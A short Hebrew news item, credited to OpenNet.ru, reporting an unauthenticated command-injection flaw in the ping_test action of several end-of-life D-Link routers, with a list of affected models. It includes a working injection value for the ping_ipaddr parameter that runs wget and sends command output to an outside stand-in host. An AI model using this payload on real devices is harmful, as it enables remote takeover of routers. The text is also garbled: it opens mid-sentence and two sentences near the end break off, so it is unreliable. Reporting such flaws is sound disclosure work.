בנתבים אלחוטיים של D-Link
מעניין לציין שלפי מפתחי הקושחה, הקריאה "ping_test" צריכה להתבצע רק לאחר אימות, אבל במציאות היא נקראת בכל מקרה, ללא קשר לכניסה לממשק האינטרנט. בפרט, בעת גישה לסקריפט application_sec.cgi והעברת הפרמטר "action=ping_test", הסקריפט מפנה מחדש לדף האימות, אך במקביל מבצע את הפעולה הקשורה ל-ping_test. כדי להפעיל את הקוד, נעשה שימוש בפגיעות נוספת ב-ping_test עצמו, אשר קורא לתוכנת ping מבלי לבדוק כראוי את נכונות כתובת ה-IP שנשלחה לבדיקה. לדוגמה, כדי לקרוא לכלי השירות wget ולהעביר את התוצאות של הפקודה "echo 1234" למארח חיצוני, פשוט ציין את הפרמטר "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
נוכחות הפגיעות אושרה רשמית בדגמים הבאים:
- DIR-655 עם קושחה 3.02b05 ומעלה;
- DIR-866L עם קושחה 1.03b04 ומעלה;
- DIR-1565 עם קושחה 1.01 ומעלה;
- DIR-652 (לא מסופק מידע על גרסאות קושחה בעייתיות)
תקופת התמיכה עבור דגמים אלה כבר פג, אז D-Link
מאוחר יותר התגלה כי גם הפגיעות
מקור: OpenNet.ru